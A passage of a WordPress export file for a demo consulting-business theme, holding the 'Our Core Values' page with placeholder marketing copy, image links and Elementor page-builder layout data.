;i:2;s:15:"_padding_mobile";i:1;}}s:5:"style";a:1:{s:10:"info_style";a:3:{s:27:"title_typography_typography";i:4;s:26:"title_typography_font_size";i:4;s:24:"job_typography_font_size";i:3;}}}}s:7:"ibutton";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:7:"content";a:1:{s:14:"button_section";a:3:{s:5:"align";i:1;s:4:"text";i:1;s:4:"link";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Our Core Values</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/our-core-values/</link>
		<pubDate>Tue, 08 Sep 2020 04:49:58 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?page_id=529</guid>
		<description></description>
		<content:encoded><![CDATA[what we offer
<h3>Make Digital Marketing  Work For Your Business</h3>
We serve clients at every level of their organization, whether as a trusted advisor to top management or as a hands-on coach. Our clients’ needs are constantly changing, so we continually seek new and better ways to serve them.

Our firm has helped clients engaged in more than 100 different subsectors of the aerospace, space markets.

<a href="#"> Explore More</a>
01
<h4>Client Learning Programs</h4>
<img width="750" height="649" src="https://maxbizz.s3.amazonaws.com/images/flip-box1.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/flip-box1.jpg 750w, https://maxbizz.s3.amazonaws.com/images/flip-box1-300x260.jpg 300w" sizes="(max-width: 750px) 100vw, 750px">

Our firm has helped clients engaged in more than 100 different subsectors of the aerospace, space markets.

<a href="#"> Explore More</a>
02
<h4>Partnership Ecosystem</h4>
<img width="750" height="649" src="https://maxbizz.s3.amazonaws.com/images/flip-box2.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/flip-box2.jpg 750w, https://maxbizz.s3.amazonaws.com/images/flip-box2-300x260.jpg 300w" sizes="(max-width: 750px) 100vw, 750px">

Our firm has helped clients engaged in more than 100 different subsectors of the aerospace, space markets.

<a href="#"> Explore More</a>
03
<h4>New Business Innovation</h4>
<img width="750" height="649" src="https://maxbizz.s3.amazonaws.com/images/flip-box3.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/flip-box3.jpg 750w, https://maxbizz.s3.amazonaws.com/images/flip-box3-300x260.jpg 300w" sizes="(max-width: 750px) 100vw, 750px">
75
<h6>marketing analysis</h6>
65
<h6>business innovation</h6>
90
<h6>finance strategy</h6>
45
<h6>corporate management</h6>
the language of business
<h3>Consultancy That Empowers You</h3>
We help you see the world differently, discover opportunities you may never have imagined and achieve results that bridge what is with what can be.

<a href="#our-philo">our philosophy</a>
<a href="#our-mission">our mission</a>
<a href="#our-vision">our vision</a>
<img width="750" height="656" src="https://maxbizz.s3.amazonaws.com/images/image1-value.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/image1-value.jpg 750w, https://maxbizz.s3.amazonaws.com/images/image1-value-300x262.jpg 300w" sizes="(max-width: 750px) 100vw, 750px">
<h4>Our Philosophy</h4>
Our clients’ needs are constantly changing, so we continually seek new and better ways to serve them. To do this, we are bringing new talent.

<svg xmlns="http://www.w3.org/2000/svg" id="Capa_1" viewBox="0 0 515.556 515.556"><path d="m0 274.226 176.549 176.886 339.007-338.672-48.67-47.997-290.337 290-128.553-128.552z"></path></svg>
<h6>
					Investment Management</h6>
We welcome and celebrate different perspectives to help our firm, our clients and our people achieve enduring results.

<svg xmlns="http://www.w3.org/2000/svg" id="Capa_1" viewBox="0 0 515.556 515.556"><path d="m0 274.226 176.549 176.886 339.007-338.672-48.67-47.997-290.337 290-128.553-128.552z"></path></svg>
<h6>
					Private Credit &amp; Equity</h6>
We hire people with exceptional talents, abilities and potential, then create an environment where you can become the best.

<a href="#">Explore More </a>
<img width="750" height="656" src="https://maxbizz.s3.amazonaws.com/images/our-vision.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/our-vision.jpg 750w, https://maxbizz.s3.amazonaws.com/images/our-vision-300x262.jpg 300w" sizes="(max-width: 750px) 100vw, 750px">
<h4>Our Mission</h4>
Our clients’ needs are constantly changing, so we continually seek new and better ways to serve them. To do this, we are bringing new talent.

<svg xmlns="http://www.w3.org/2000/svg" id="Capa_1" viewBox="0 0 515.556 515.556"><path d="m0 274.226 176.549 176.886 339.007-338.672-48.67-47.997-290.337 290-128.553-128.552z"></path></svg>
<h6>
					Investment Management</h6>
We welcome and celebrate different perspectives to help our firm, our clients and our people achieve enduring results.

<svg xmlns="http://www.w3.org/2000/svg" id="Capa_1" viewBox="0 0 515.556 515.556"><path d="m0 274.226 176.549 176.886 339.007-338.672-48.67-47.997-290.337 290-128.553-128.552z"></path></svg>
<h6>
					Private Credit &amp; Equity</h6>
We hire people with exceptional talents, abilities and potential, then create an environment where you can become the best.

<a href="#">Explore More </a>
<img width="750" height="660" src="https://maxbizz.s3.amazonaws.com/images/image2-home1.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/image2-home1.jpg 750w, https://maxbizz.s3.amazonaws.com/images/image2-home1-300x264.jpg 300w" sizes="(max-width: 750px) 100vw, 750px">
<h4>Our Vision</h4>
Our clients’ needs are constantly changing, so we continually seek new and better ways to serve them. To do this, we are bringing new talent.

<svg xmlns="http://www.w3.org/2000/svg" id="Capa_1" viewBox="0 0 515.556 515.556"><path d="m0 274.226 176.549 176.886 339.007-338.672-48.67-47.997-290.337 290-128.553-128.552z"></path></svg>
<h6>
					Investment Management</h6>
We welcome and celebrate different perspectives to help our firm, our clients and our people achieve enduring results.

<svg xmlns="http://www.w3.org/2000/svg" id="Capa_1" viewBox="0 0 515.556 515.556"><path d="m0 274.226 176.549 176.886 339.007-338.672-48.67-47.997-290.337 290-128.553-128.552z"></path></svg>
<h6>
					Private Credit &amp; Equity</h6>
We hire people with exceptional talents, abilities and potential, then create an environment where you can become the best.

<a href="#">Explore More </a>
main principles
<h3>Global Reach with Local  Understanding</h3>
Exceptional Client Service

In healthy companies, changing directions or launching new projects means combining underlying strengths and capacities with new energy and support.

A Great Team and Winning Culture

In healthy companies, changing directions or launching new projects means combining underlying strengths and capacities with new energy and support.

A Commitment to Integrity, Fairness

In healthy companies, changing directions or launching new projects means combining underlying strengths and capacities with new energy and support.

<img width="606" height="342" src="https://maxbizz.s3.amazonaws.com/images/chart-values-home3.png" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/chart-values-home3.png 606w, https://maxbizz.s3.amazonaws.com/images/chart-values-home3-300x169.png 300w" sizes="(max-width: 606px) 100vw, 606px">
testimonials
<h3>What People Say About Us</h3>
<img src="https://maxbizz.s3.amazonaws.com/images/testi1.png" alt="Oliver Simson">
“We know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.”
<h6>Oliver Simson</h6>
client of company
<img src="https://maxbizz.s3.amazonaws.com/images/testi2.png" alt="Mary Grey">
“We know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.”
<h6>Mary Grey</h6>
Manager
<img src="https://maxbizz.s3.amazonaws.com/images/testi3.png" alt="Samanta Fox">
“We know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.”
<h6>Samanta Fox</h6>
Designer
<iframe frameborder="0" scrolling="no" marginheight="0" marginwidth="0" src="https://maps.google.com/maps?q=411%20University%20St%2C%20Seattle%2C%20USA&amp;t=m&amp;z=10&amp;output=embed&amp;iwloc=near" title="411 University St, Seattle, USA" aria-label="411 University St, Seattle, USA"></iframe>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>529</wp:post_id>
		<wp:post_date><![CDATA[2020-09-08 04:49:58]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-08 04:49:58]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[our-core-values]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[page]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[page_layout]]></wp:meta_key>
		<wp:meta_value><![CDATA[full-content]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[is_trans]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[#ffffff]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.15]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"db1842d","elType":"section","settings":{"padding":{"unit":"px","top":"120","right":"0","bottom":"120","left":"0","isLinked":false},"padding_tablet":{"unit":"px","top":"80","right":"0","bottom":"80","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"84cfb4a","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"de37b10","elType":"section","settings":{"gap":"extended","content_position":"bottom","structure":"20","padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"2519f8f","elType":"column","settings":{"_column_size":50,"_inline_size":42},"elements":[{"id":"10ad2ad","elType":"widget","settings":{"sub":"what we offer","title":"Make Digital Marketing  Work For Your Business","header_size":"h3","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"stitle_bg":"#4B83FC1A","title_typography_typography":"custom","title_typography_font_size_mobile":{"unit":"px","size":30,"sizes":[]},"is_highlight":"","stitle_typography_typography":"custom","stitle_typography_font_size":{"unit":"px","size":14,"sizes":[]}},"elements":[],"widgetType":"iheading"}],"isInner":true},{"id":"5aeaeb4","elType":"column","settings":{"_column_size":50,"_inline_size":58},"elements":[{"id":"3148f6f","elType":"widget","settings":{"editor":"<p>We serve clients at every level of their organization, whether as a trusted advisor to top management or as a hands-on coach. Our clients\u2019 needs are constantly changing, so we continually seek new and better ways to serve them.<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true},{"id":"87d4f34","elType":"section","settings":{"gap":"extended","structure":"30","layout":"full_width"},"elements":[{"id":"b70b980","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"73c0a87","elType":"widget","settings":{"image_box":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/flip-box1.jpg","id":1955},"number":"01","title":"Client Learning Programs","des":"Our firm has helped clients engaged in more than 100 different subsectors of the aerospace, space markets.","label_link":"<i class=\"ot-flaticon-trajectory\"><\/i> Explore More","_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""}},"elements":[],"widgetType":"iflip_box"}],"isInner":true},{"id":"bc54eaf","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"2e00231","elType":"widget","settings":{"image_box":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/flip-box2.jpg","id":1956},"number":"02","title":"Partnership Ecosystem","des":"Our firm has helped clients engaged in more than 100 different subsectors of the aerospace, space markets.","label_link":"<i class=\"ot-flaticon-trajectory\"><\/i> Explore More","_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""}},"elements":[],"widgetType":"iflip_box"}],"isInner":true},{"id":"36da7a0","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":100,"margin_tablet":{"unit":"%","top":"0","right":"25","bottom":"0","left":"25","isLinked":false},"margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"a72089a","elType":"widget","settings":{"image_box":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/flip-box3.jpg","id":1957},"number":"03","title":"New Business Innovation","des":"Our firm has helped clients engaged in more than 100 different subsectors of the aerospace, space markets.","label_link":"<i class=\"ot-flaticon-trajectory\"><\/i> Explore More","link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""}},"elements":[],"widgetType":"iflip_box"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"4c9f589","elType":"section","settings":{"structure":"40","background_background":"classic","background_color":"#F5F5F5","padding":{"unit":"px","top":"80","right":"0","bottom":"80","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"23a042a","elType":"column","settings":{"_column_size":25,"_inline_size":null},"elements":[{"id":"b29ab89","elType":"widget","settings":{"bar_style":"circle","title":"marketing analysis","percent":{"unit":"%","size":75,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#D92300","title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]}},"elements":[],"widgetType":"iprogress"}],"isInner":false},{"id":"0e7cc6c","elType":"column","settings":{"_column_size":25,"_inline_size":null},"elements":[{"id":"3eaebc8","elType":"widget","settings":{"bar_style":"circle","title":"business innovation","percent":{"unit":"%","size":65,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#D92300","title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]}},"elements":[],"widgetType":"iprogress"}],"isInner":false},{"id":"a146db1","elType":"column","settings":{"_column_size":25,"_inline_size":null},"elements":[{"id":"7c66c5a","elType":"widget","settings":{"bar_style":"circle","title":"finance strategy","percent":{"unit":"%","size":90,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#D92300","title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]}},"elements":[],"widgetType":"iprogress"}],"isInner":false},{"id":"8a93a84","elType":"column","settings":{"_column_size":25,"_inline_size":null},"elements":[{"id":"7f8aa51","elType":"widget","settings":{"bar_style":"circle","title":"corporate management","percent":{"unit":"%","size":45,"sizes":[]},"bar_color":"#D92300","title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]}},"elements":[],"widgetType":"iprogress"}],"isInner":false}],"isInner":false},{"id":"076fd4b","elType":"section","settings":{"background_background":"classic","background_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/bg1-value.jpg","id":1979},"background_position":"center center","background_repeat":"no-repeat","background_size":"cover","padding":{"unit":"px","top":"117","right":"0","bottom":"0","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"87682dc","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"cf617aa","elType":"section","settings":{"gap":"extended","structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"73","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"695bdb3","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true},{"id":"90b64c6","elType":"column","settings":{"_column_size":33,"_inline_size":57.33200000000000073896444519050419330596923828125,"_inline_size_tablet":80},"elements":[{"id":"eb959a2","elType":"widget","settings":{"sub":"the language of business","title":"Consultancy That Empowers You","header_size":"h3","align":"center","title_color":"#FFFFFF","_padding":{"unit":"px","top":"0","right":"0","bottom":"23","left":"0","isLinked":false},"stitle_bg":"#4B83FC1A","title_typography_typography":"custom","title_typography_font_size_mobile":{"unit":"px","size":30,"sizes":[]},"is_highlight":"","stitle_typography_typography":"custom","stitle_typography_font_size":{"unit":"px","size":14,"sizes":[]}},"elements":[],"widgetType":"iheading"},{"id":"df732f4","elType":"widget","settings":{"editor":"<p>We help you see the world differently, discover opportunities you may never have imagined and achieve results that bridge what is with what can be.<\/p>","align":"center","text_color":"#FFFFFF"},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"c95075f","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true}],"isInner":true},{"id":"512e7f1","elType":"section","settings":{"layout":"full_width"},"elements":[{"id":"0b4ba37","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"20a92cd","elType":"widget","settings":{"title_boxes":[{"_id":"228c623","titles":"our philosophy","title_link":"#our-philo"},{"_id":"71b96ee","titles":"our mission","title_link":"#our-mission"},{"titles":"our vision","title_link":"#our-vision","_id":"02bca8a"}],"radius_title":{"unit":"px","top":"3","right":"3","bottom":"0","left":"0","isLinked":false},"title_bg":"#FFFFFF33","title_active_color":"#1B1D21","title_active_bg":"#FFFFFF"},"elements":[],"widgetType":"itabtitle"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"25cec1f","elType":"section","settings":{"gap":"extended","content_position":"middle","structure":"20","padding":{"unit":"px","top":"86","right":"0","bottom":"120","left":"0","isLinked":false},"_element_id":"our-philo","css_classes":"content-tab","padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"69079ef","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[{"id":"e1703a9","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/image1-value.jpg","id":1966},"image_size":"full","image_box_shadow_box_shadow_type":"yes","image_box_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":30,"spread":0,"color":"rgba(0, 0, 0, 0.12)"}},"elements":[],"widgetType":"image"}],"isInner":false},{"id":"c7f2f31","elType":"column","settings":{"_column_size":50,"_inline_size":null,"margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"40","isLinked":false},"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"797598f","elType":"widget","settings":{"title":"Our Philosophy","header_size":"h4","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"06391c3","elType":"widget","settings":{"editor":"<p>Our clients\u2019 needs are constantly changing, so we continually seek new and better ways to serve them. To do this, we are bringing new talent.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"ae1ab95","elType":"widget","settings":{"selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/interface.svg","id":629},"library":"svg"},"title_text":"Investment Management","description_text":"We welcome and celebrate different perspectives to help our firm, our clients and our people achieve enduring results.","position":"left","title_size":"h6","primary_color":"#D92300","icon_space":{"unit":"px","size":20,"sizes":[]},"icon_size":{"unit":"px","size":17,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":10,"sizes":[]},"title_color":"#D92300","title_typography_typography":"custom","title_typography_font_family":"Raleway","title_typography_line_height":{"unit":"px","size":17,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"description_color":"#5F5F5F","description_typography_typography":"custom","description_typography_font_family":"Open Sans","description_typography_font_weight":"400","title_typography_font_size":{"unit":"px","size":18,"sizes":[]}},"elements":[],"widgetType":"icon-box"},{"id":"6444584","elType":"widget","settings":{"selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/interface.svg","id":629},"library":"svg"},"title_text":"Private Credit & Equity","description_text":"We hire people with exceptional talents, abilities and potential, then create an environment where you can become the best.","position":"left","title_size":"h6","primary_color":"#D92300","icon_space":{"unit":"px","size":20,"sizes":[]},"icon_size":{"unit":"px","size":17,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":10,"sizes":[]},"title_color":"#D92300","title_typography_typography":"custom","title_typography_font_family":"Raleway","title_typography_line_height":{"unit":"px","size":17,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"description_color":"#5F5F5F","description_typography_typography":"custom","description_typography_font_family":"Open Sans","description_typography_font_weight":"400","title_typography_font_size":{"unit":"px","size":18,"sizes":[]}},"elements":[],"widgetType":"icon-box"},{"id":"45d2a82","elType":"widget","settings":{"text":"Explore More "},"elements":[],"widgetType":"ibutton"}],"isInner":false}],"isInner":false},{"id":"3076906","elType":"section","settings":{"gap":"extended","content_position":"middle","structure":"20","padding":{"unit":"px","top":"86","right":"0","bottom":"120","left":"0","isLinked":false},"_element_id":"our-mission","css_classes":"content-tab","padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"d0c38ef","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[{"id":"0a21f5d","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/our-vision.jpg","id":1964},"image_size":"full","image_box_shadow_box_shadow_type":"yes","image_box_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":30,"spread":0,"color":"rgba(0, 0, 0, 0.12)"},"image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true}},"elements":[],"widgetType":"image"}],"isInner":false},{"id":"4554b13","elType":"column","settings":{"_column_size":50,"_inline_size":null,"margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"40","isLinked":false},"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"ebcd194","elType":"widget","settings":{"title":"Our Mission","header_size":"h4","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"0ef6c14","elType":"widget","settings":{"editor":"<p>Our clients\u2019 needs are constantly changing, so we continually seek new and better ways to serve them. To do this, we are bringing new talent.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"6614930","elType":"widget","settings":{"selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/interface.svg","id":629},"library":"svg"},"title_text":"Investment Management","description_text":"We welcome and celebrate different perspectives to help our firm, our clients and our people achieve enduring results.","position":"left","title_size":"h6","primary_color":"#D92300","icon_space":{"unit":"px","size":20,"sizes":[]},"icon_size":{"unit":"px","size":17,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":10,"sizes":[]},"title_color":"#D92300","title_typography_typography":"custom","title_typography_font_family":"Raleway","title_typography_line_height":{"unit":"px","size":17,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"description_color":"#5F5F5F","description_typography_typography":"custom","description_typography_font_family":"Open Sans","description_typography_font_weight":"400","title_typography_font_size":{"unit":"px","size":18,"sizes":[]}},"elements":[],"widgetType":"icon-box"},{"id":"61f0b81","elType":"widget","settings":{"selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/interface.svg","id":629},"library":"svg"},"title_text":"Private Credit & Equity","description_text":"We hire people with exceptional talents, abilities and potential, then create an environment where you can become the best.","position":"left","title_size":"h6","primary_color":"#D92300","icon_space":{"unit":"px","size":20,"sizes":[]},"icon_size":{"unit":"px","size":17,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":10,"sizes":[]},"title_color":"#D92300","title_typography_typography":"custom","title_typography_font_family":"Raleway","title_typography_line_height":{"unit":"px","size":17,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"description_color":"#5F5F5F","description_typography_typography":"custom","description_typography_font_family":"Open Sans","description_typography_font_weight":"400","title_typography_font_size":{"unit":"px","size":18,"sizes":[]}},"elements":[],"widgetType":"icon-box"},{"id":"ed79a7d","elType":"widget","settings":{"text":"Explore More "},"elements":[],"widgetType":"ibutton"}],"isInner":false}],"isInner":false},{"id":"dd17773","elType":"section","settings":{"gap":"extended","content_position":"middle","structure":"20","padding":{"unit":"px","top":"86","right":"0","bottom":"120","left":"0","isLinked":false},"_element_id":"our-vision","css_classes":"content-tab","padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"49ce3f7","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[{"id":"fc1c0ad","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/image2-home1.jpg","id":1967},"image_size":"full","image_box_shadow_box_shadow_type":"yes","image_box_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":30,"spread":0,"color":"rgba(0, 0, 0, 0.12)"},"image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true}},"elements":[],"widgetType":"image"}],"isInner":false},{"id":"cd3eacf","elType":"column","settings":{"_column_size":50,"_inline_size":null,"margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"40","isLinked":false},"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"42d9c0e","elType":"widget","settings":{"title":"Our Vision","header_size":"h4","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"2922134","elType":"widget","settings":{"editor":"<p>Our clients\u2019 needs are constantly changing, so we continually seek new and better ways to serve them. To do this, we are bringing new talent.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"a7bdb59","elType":"widget","settings":{"selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/interface.svg","id":629},"library":"svg"},"title_text":"Investment Management","description_text":"We welcome and celebrate different perspectives to help our firm, our clients and our people achieve enduring results.","position":"left","title_size":"h6","primary_color":"#D92300","icon_space":{"unit":"px","size":20,"sizes":[]},"icon_size":{"unit":"px","size":17,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":10,"sizes":[]},"title_color":"#D92300","title_typography_typography":"custom","title_typography_font_family":"Raleway","title_typography_line_height":{"unit":"px","size":17,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"description_color":"#5F5F5F","description_typography_typography":"custom","description_typography_font_family":"Open Sans","description_typography_font_weight":"400","title_typography_font_size":{"unit":"px","size":18,"sizes":[]}},"elements":[],"widgetType":"icon-box"},{"id":"d35150b","elType":"widget","settings":{"selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/interface.svg","id":629},"library":"svg"},"title_text":"Private Credit & Equity","description_text":"We hire people with exceptional talents, abilities and potential, then create an environment where you can become the best.","position":"left","title_size":"h6","primary_color":"#D92300","icon_space":{"unit":"px","size":20,"sizes":[]},"icon_size":{"unit":"px","size":17,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":10,"sizes":[]},"title_color":"#D92300","title_typography_typography":"custom","title_typography_font_family":"Raleway","title_typography_line_height":{"unit":"px","size":17,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"description_color":"#5F5F5F","description_typography_typography":"custom","description_typography_font_family":"Open Sans","description_typography_font_weight":"400","title_typography_font_size":{"unit":"px","size":18,"sizes":[]}},"elements":[],"widgetType":"icon-box"},{"id":"9c23cfd","elType":"widget","settings":{"text":"Explore More 